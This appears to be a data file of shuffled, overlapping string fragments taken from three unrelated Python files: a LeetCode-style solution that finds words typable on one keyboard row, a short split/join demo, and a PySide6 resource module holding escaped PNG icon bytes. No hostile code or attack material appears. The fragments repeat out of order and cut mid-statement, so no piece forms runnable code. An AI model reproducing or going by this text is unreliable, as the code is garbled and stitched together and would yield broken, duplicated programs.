"['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 = ['a',",
"only contain letters of alphabet. \"\"\" from typing import List class Solution: def",
"[] for word in words: Hash = {'first': 0, 'second': 0, 'third': 0}",
"List of words, return the words that can be typed using letters of",
"letters of alphabet on only one row's of American keyboard like the image",
"+ 1 if letter in row3: Hash['third'] = Hash['third'] + 1 if Hash['first']",
"def findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r', 't',",
"row's of American keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\",",
"words: Hash = {'first': 0, 'second': 0, 'third': 0} for letter in list(word.lower()):",
"[\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one character",
"import List class Solution: def findWords(self, words: List[str]) -> List[str]: row1 = ['q',",
"assume the input string will only contain letters of alphabet. \"\"\" from typing",
"'s', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c',",
"\"\"\" Given a List of words, return the words that can be typed",
"letter in row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word) or",
"'v', 'b', 'n', 'm'] inteligentWords = [] for word in words: Hash =",
"if letter in row1: Hash['first'] = Hash['first'] + 1 if letter in row2:",
"= {'first': 0, 'second': 0, 'third': 0} for letter in list(word.lower()): if letter",
"'d', 'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v',",
"'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd',",
"using letters of alphabet on only one row's of American keyboard like the",
"+ 1 if letter in row2: Hash['second'] = Hash['second'] + 1 if letter",
"of American keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]",
"typing import List class Solution: def findWords(self, words: List[str]) -> List[str]: row1 =",
"one character in the keyboard more than once. You may assume the input",
"\"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one character in",
"'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for word in words: Hash",
"keyboard more than once. You may assume the input string will only contain",
"0} for letter in list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] +",
"in the keyboard more than once. You may assume the input string will",
"in words: Hash = {'first': 0, 'second': 0, 'third': 0} for letter in",
"1 if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] == len(word):",
"of words, return the words that can be typed using letters of alphabet",
"<filename>Hash/keyword-rows.py \"\"\" Given a List of words, return the words that can be",
"string will only contain letters of alphabet. \"\"\" from typing import List class",
"if letter in row2: Hash['second'] = Hash['second'] + 1 if letter in row3:",
"words, return the words that can be typed using letters of alphabet on",
"of alphabet on only one row's of American keyboard like the image below.",
"'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = []",
"in row1: Hash['first'] = Hash['first'] + 1 if letter in row2: Hash['second'] =",
"= ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for word",
"'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f',",
"words: List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u',",
"'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for word in words:",
"+ 1 if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] ==",
"['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for word in",
"row2: Hash['second'] = Hash['second'] + 1 if letter in row3: Hash['third'] = Hash['third']",
"'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j',",
"of alphabet. \"\"\" from typing import List class Solution: def findWords(self, words: List[str])",
"in list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] + 1 if letter",
"if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] == len(word): inteligentWords.append(word)",
"the keyboard more than once. You may assume the input string will only",
"for word in words: Hash = {'first': 0, 'second': 0, 'third': 0} for",
"only one row's of American keyboard like the image below. Example: Input: [\"Hello\",",
"Hash['second'] + 1 if letter in row3: Hash['third'] = Hash['third'] + 1 if",
"in row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second']",
"one row's of American keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\",",
"in row2: Hash['second'] = Hash['second'] + 1 if letter in row3: Hash['third'] =",
"[\"Alaska\", \"Dad\"] Note: You may use one character in the keyboard more than",
"== len(word) or Hash['second'] == len(word) or Hash['third'] == len(word): inteligentWords.append(word) return inteligentWords",
"Given a List of words, return the words that can be typed using",
"You may assume the input string will only contain letters of alphabet. \"\"\"",
"character in the keyboard more than once. You may assume the input string",
"may use one character in the keyboard more than once. You may assume",
"-> List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o',",
"use one character in the keyboard more than once. You may assume the",
"Note: You may use one character in the keyboard more than once. You",
"Output: [\"Alaska\", \"Dad\"] Note: You may use one character in the keyboard more",
"row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2",
"row1: Hash['first'] = Hash['first'] + 1 if letter in row2: Hash['second'] = Hash['second']",
"'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n',",
"'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b',",
"Hash['first'] = Hash['first'] + 1 if letter in row2: Hash['second'] = Hash['second'] +",
"'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k',",
"may assume the input string will only contain letters of alphabet. \"\"\" from",
"= Hash['second'] + 1 if letter in row3: Hash['third'] = Hash['third'] + 1",
"= Hash['first'] + 1 if letter in row2: Hash['second'] = Hash['second'] + 1",
"\"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one character in the",
"be typed using letters of alphabet on only one row's of American keyboard",
"can be typed using letters of alphabet on only one row's of American",
"word in words: Hash = {'first': 0, 'second': 0, 'third': 0} for letter",
"row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second'] ==",
"letter in row1: Hash['first'] = Hash['first'] + 1 if letter in row2: Hash['second']",
"the input string will only contain letters of alphabet. \"\"\" from typing import",
"'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords",
"row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for",
"the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note:",
"once. You may assume the input string will only contain letters of alphabet.",
"the words that can be typed using letters of alphabet on only one",
"input string will only contain letters of alphabet. \"\"\" from typing import List",
"'m'] inteligentWords = [] for word in words: Hash = {'first': 0, 'second':",
"letters of alphabet. \"\"\" from typing import List class Solution: def findWords(self, words:",
"'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l']",
"'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm']",
"'second': 0, 'third': 0} for letter in list(word.lower()): if letter in row1: Hash['first']",
"\"Dad\"] Note: You may use one character in the keyboard more than once.",
"that can be typed using letters of alphabet on only one row's of",
"letter in list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] + 1 if",
"List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p'];",
"'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords =",
"1 if letter in row2: Hash['second'] = Hash['second'] + 1 if letter in",
"\"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one character in the keyboard",
"= [] for word in words: Hash = {'first': 0, 'second': 0, 'third':",
"'n', 'm'] inteligentWords = [] for word in words: Hash = {'first': 0,",
"alphabet on only one row's of American keyboard like the image below. Example:",
"'t', 'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g',",
"0, 'third': 0} for letter in list(word.lower()): if letter in row1: Hash['first'] =",
"a List of words, return the words that can be typed using letters",
"will only contain letters of alphabet. \"\"\" from typing import List class Solution:",
"= ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z',",
"List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i',",
"on only one row's of American keyboard like the image below. Example: Input:",
"more than once. You may assume the input string will only contain letters",
"Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one",
"than once. You may assume the input string will only contain letters of",
"findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y',",
"contain letters of alphabet. \"\"\" from typing import List class Solution: def findWords(self,",
"1 if letter in row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] ==",
"0, 'second': 0, 'third': 0} for letter in list(word.lower()): if letter in row1:",
"American keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output:"
] |
[
"<reponame>janbodnar/Python-Course #!/usr/bin/python # split_join.py nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m",
"#!/usr/bin/python # split_join.py nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m =",
"split_join.py nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m = ':'.join(n) print",
"# split_join.py nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m = ':'.join(n)",
"nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m = ':'.join(n) print (m)"
] |
[
"in this file will be lost! from PySide6 import QtCore qt_resource_data = b\"\\",
"QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\",
"\\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\",
"\\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\",
"c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\",
"\\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \"",
"changes made in this file will be lost! from PySide6 import QtCore qt_resource_data",
"\\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\",
"\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)",
"\\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c",
"code (Python 3) # Created by: object code # Created by: The Resource",
"import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\",
"\\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\",
"\\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\",
"\\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\",
"S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\",
"\\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\",
"<gh_stars>0 # Resource object code (Python 3) # Created by: object code #",
"\\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\",
"Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\",
"\\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\",
